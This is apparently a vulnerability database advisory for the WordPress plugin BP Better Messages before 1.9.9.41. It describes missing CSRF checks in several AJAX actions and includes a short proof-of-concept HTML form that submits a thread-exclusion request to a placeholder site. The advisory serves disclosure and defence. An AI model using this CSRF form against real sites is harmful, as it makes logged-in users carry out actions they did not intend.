WordPress Plugin Vulnerabilities
BP Better Messages < 1.9.9.41 - Multiple CSRF
Description
The plugin does not check for CSRF in multiple of its AJAX actions: bp_better_messages_leave_chat, bp_better_messages_join_chat, bp_messages_leave_thread, bp_messages_mute_thread, bp_messages_unmute_thread, bp_better_messages_add_user_to_thread, bp_better_messages_exclude_user_from_thread. This could allow attackers to make logged in users do unwanted actions
Proof of Concept
<html> <body> <form action="https://example.com/wp-admin/admin-ajax.php" method="POST"> <input type="hidden" name="action" value="bp_better_messages_exclude_user_from_thread" /> <input type="hidden" name="user_id" value="4" /> <input type="hidden" name="thread_id" value="3" /> <input type="submit" value="Submit request" /> </form> </body> </html>
Affects Plugins
References
Classification
Type
CSRF
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
Brandon Roldan
Submitter
Brandon Roldan
Submitter twitter
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2021-10-04 (about 2 years ago)
Added
2021-10-04 (about 2 years ago)
Last Updated
2022-04-15 (about 2 years ago)